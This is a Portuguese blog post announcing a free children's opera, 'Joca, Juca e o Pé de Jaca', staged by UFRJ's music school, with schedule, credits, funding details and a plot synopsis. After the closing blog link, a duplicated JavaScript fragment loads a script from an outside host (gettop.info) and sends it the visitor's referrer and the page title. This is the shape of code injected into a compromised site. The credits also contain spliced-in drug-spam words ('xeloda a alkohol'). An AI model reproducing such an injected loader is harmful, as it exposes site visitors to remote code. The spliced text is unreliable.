LateralÓperaProgramaçãoRio de Janeiro

“Joca, Juca e o pé de jaca” – ópera infantil

Outubro é o mês das cri­anças e a Es­cola de Mú­sica (EM) tem um pre­sente es­pe­cial para elas: a ópera in­fantil “Jo­ca, Ju­ca e o Pé de Ja­ca”.

SERVIÇO

 

Escola de Música da UFRJ
Salão Leopoldo Miguez
Rua do Passeio, 98
Fone: 21 2240 1391

Dia 11.10, às 14h30 e às 18h30; dia 12.10, às 16h.; e dia 14.10, às 14h30.

Entrada franca

 

Libreto e Música: Rafael Bezerra

Direção Geral: Maria José Chevitarese

 

O trabalho em pauta objetiva dar continuidade ao vitorioso projeto “A ESCOLA VAI À ÓPERA”, idealizado pela Profa Dra Maria José Chevitarese, que em 2008 conquistou um público de mais de 2.500 pessoas, entre crianças e adultos, em apenas quatro récitas da ópera “Maroquinhas Fru-fru”, composição de Ernst Mahle sobre texto de Maria Clara Machado.

Dessa vez a idealizadora vai além e busca continuar a manter aberto esse espaço da linguagem da ópera para alunos da rede pública de ensino numa obra com temática apropriada para esta faixa etária, com linguagem acessível ao público infanto-juvenil, e de difundir a ópera brasileira em vernáculo. A obra, com libreto e musica do mestrando em composição Rafael Bezerra, conta a divertida história de “Juca, Joca e o Pé de Jaca”.

O projeto vencedor em 2010 do edital n° 5 do Programa de Extensão Universitária (ProExt- MEC/SESU), que tem como objetivo apoiar as instituições públicas de ensino superior no desenvolvimento de programas ou projetos de extensão que contribuam para a implementação de políticas públicas com ênfase na inclusão social, recebeu do MEC/Sesu o aporte de recursos necessários para sua implementação. O projeto conta ainda com o valioso apoio da Escola de Música da UFRJ onde são realizados os ensaios e apresentações, do Setor Financeiro, viabilizando todos os pagamentos e compras do projeto e do Setor Artístico apoiando em todos os momentos de construção e execução do projeto.

A proposta estética da montagem é superlativar a trama de forma a remeter a uma narrativa fantástica, mágica e reportar à ideia dos grandes cenários operísticos e à linguagem das narrativas infantis buscando um diálogo entre estes e algumas formas narrativas infantis, tais como, teatro de sombras e bonecos.  No sentido de procurar dialogar com o cotidiano do público, busca-se inspiração na xilogravura, cordel, e no desenho animado, bem como no artesanato popular (esculturas em barro, rendas, bordados, fuxico, retalhos, matelassê, sucata, acabamentos manuais, em ponto de cruz ou chuleio), sob responsabilidade de Rosanna Perez.

O projeto tem como um de seus objetivos atingir principalmente estudantes da rede pública municipal, estadual e federal do ensino fundamental e médio. Estudantes e professores do curso de bacharelado e licenciatura e mestrado em música também são alvo do projeto, totalizando 3.000 pessoas. Para isso estabeleceu-se ou firmou-se parceria com as secretarias Municipal e Estadual de Educação e Cultura do Rio de Janeiro, cuja participação se dá no sentido da divulgação e inscrição das escolas da rede pública, para assistirem à ópera.

Diversos setores da universidade trabalham em conjunto para o sucesso do projeto: Pós-graduação, Bacharelado e Licenciatura em Música; Comunicação; Belas Artes; Dança; UFRJMar, além do Coral Infantil da UFRJ e do Brasil Ensemble UFRJ. Na área da composição e pesquisa, contamos com a colaboração do Prof Marcos Nogueira e na área de regência orquestral do Prof. Ernani Aguiar. A direção geral é da Profa xeloda a alkohol Maria José Chevitarese.

 

Um pouco da história

A história se passa nos dias atuais em um pequeno sítio do interior do Rio de Janeiro, onde os irmãos Joca e Juca moram e aprontam as maiores bagunças possíveis. Juca é o mais velho dos dois, e tem dez anos, enquanto Joca, seu irmão caçula, tem sete anos. No pequeno sítio de sua família, pode-se encontrar certa variedade de árvores frutíferas, porém a que mais chama a atenção dos dois irmãos é uma jaqueira, que já havia vindo ao mundo mesmo antes deles pensarem em existir.

Além de Joca e Juca, outros que fazem a maior bagunça são Felícia, Felina, Janjão e Janjinho.  Quem são eles?  São nada mais nada menos que as gatas e os cães de estimação de Joca e Juca.  Felícia é uma gata siamesa, e Janjão é um cão bulldog, e ambos pertencem a Joca.  Os de Juca são Felina, uma gata persa, e Janjinho, um cão São Bernardo.  Felina e Janjão são os mal-humorados, resmungões e sabichões da história.  Felícia é toda cheia de si e Janjinho, pobre coitado, é pau-mandado de Janjão, praticamente sem vontade própria.  Felícia e Felina vivem em pé de guerra contra Janjão e Janjinho, que sempre levam a pior. Tudo começa quando, numa manhã ensolarada, Joca e Juca acordam e percebem que seus pais não estão em casa, o que é sinal de liberdade para aprontarem o que quiserem sem se preocuparem com as consequências no momento, é claro.

 

Acesse o endereço abaixo e veja muito mais sobre esta ópera:

http://jocajuca2011.blogspot.com

 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.